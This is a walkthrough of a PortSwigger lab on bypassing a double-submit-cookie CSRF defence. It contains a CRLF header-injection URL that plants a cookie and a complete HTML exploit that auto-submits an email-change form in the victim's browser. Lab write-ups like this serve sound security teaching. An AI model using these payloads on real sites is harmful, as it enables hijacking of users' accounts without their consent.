[This lab](https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-duplicated-in-cookie) demonstrates the broken **double submit cookie** defense, where the CSRF token is sent both as a cookie and a POST parameter — and the server **blindly compares the two**. If you can inject your **own CSRF token cookie** into the victim's browser (via a reflected input like `search`), then your form submission with a matching token becomes valid CSRF. ##### Phase 1: Understand the CSRF Mechanism 1. Log in as `wiener:peter` 2. Go to **My account → Change email** 3. Submit an email (e.g., `[email protected]`) 4. In **Burp**, capture the request: ```http POST /my-account/change-email HTTP/1.1 Cookie: session=...; csrf=abc123 Content-Type: application/x-www-form-urlencoded csrf=abc123 [email protected] ``` ✅ The CSRF token is: - In a **cookie** (`csrf=abc123`) - And in the **body** (`csrf=abc123`) ![[CleanShot 2025-04-23 at 19.39.38.png]] ✅ The server just checks: ```python if request.cookie["csrf"] == request.body["csrf"]: process_request() ``` --- ##### Phase 2: Confirm You Can Inject Cookies 1. Go to `/` or search page and try this URL: ``` /?search=test%0d%0aSet-Cookie:%20csrf=bersec%3b%20SameSite=None ``` 2. Check the **response headers** in Burp ✅ You should see: ```http Set-Cookie: csrf=fake; SameSite=None ``` 🎯 That means: **you can inject your own CSRF token** into the victim's browser via a reflected `Set-Cookie` header. ![[CleanShot 2025-04-23 at 19.41.46.png]] --- #### Phase 3: Build the Exploit Use this payload: ```html <form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="csrf" value="bersec"> <input type="hidden" name="email" value="[email protected]"> </form> <img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=bersec%3b%20SameSite=None" onerror="document.forms[0].submit();"> ``` - Replace `YOUR-LAB-ID` with the actual lab domain - Use a **new email address** not already registered ✅ This payload: - Injects a **`csrf=bersec` cookie** - Sends a **`csrf=bersec` POST value** - Bypasses the double-submit token check --- #### Phase 4: Deploy and Deliver 1. Go to the **Exploit Server** 2. Paste the exploit into the **Body** 3. Click **Store** 4. Click **Deliver to victim** ✅ Lab is **solved** when the victim’s email is changed using the injected CSRF token